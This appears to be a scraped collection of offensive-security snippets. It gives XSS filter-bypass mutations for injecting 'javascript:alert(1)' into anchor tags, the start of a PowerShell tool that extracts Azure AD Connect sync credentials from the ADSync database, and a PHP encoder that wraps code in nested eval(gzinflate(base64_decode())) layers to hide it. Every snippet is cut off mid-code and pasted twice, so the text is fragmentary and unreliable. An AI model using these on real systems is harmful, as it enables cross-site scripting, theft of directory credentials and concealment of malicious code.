MksYi MksYi

## mutation_a.txt
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]

## azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return

## Gzinflate Base64 Encode And Decode
<?php
function encode2($str) {
    for ($i = 1;$i <= $_POST['num'];$i++) {
        $str = 'eval(gzinflate(base64_decode("'.base64_encode(gzdeflate($str)).'")));';
    }
    return $str;
}
function encode3($str) {
    $mh_1 = str_replace("gzinflate", "\$_X", $str);
    $mh_2 = str_replace("base64_decode", "\$_T", $mh_1);
	<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

	[1]
	Bytes:
	\x09 \x0a \x0c \x0d \x20 \x2f

	<a/href="javascript:alert(1)">
	<a\x09href="javascript:alert(1)">

	[2,3]
	Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
	Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

	$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

	try {
	$client.Open()
	} catch {
	Write-Host "[!] Could not connect to localdb..."
	return
	<?php
	function encode2($str) {
	for ($i = 1;$i <= $_POST['num'];$i++) {
	$str = 'eval(gzinflate(base64_decode("'.base64_encode(gzdeflate($str)).'")));';
	}
	return $str;
	}
	function encode3($str) {
	$mh_1 = str_replace("gzinflate", "\$_X", $str);
	$mh_2 = str_replace("base64_decode", "\$_T", $mh_1);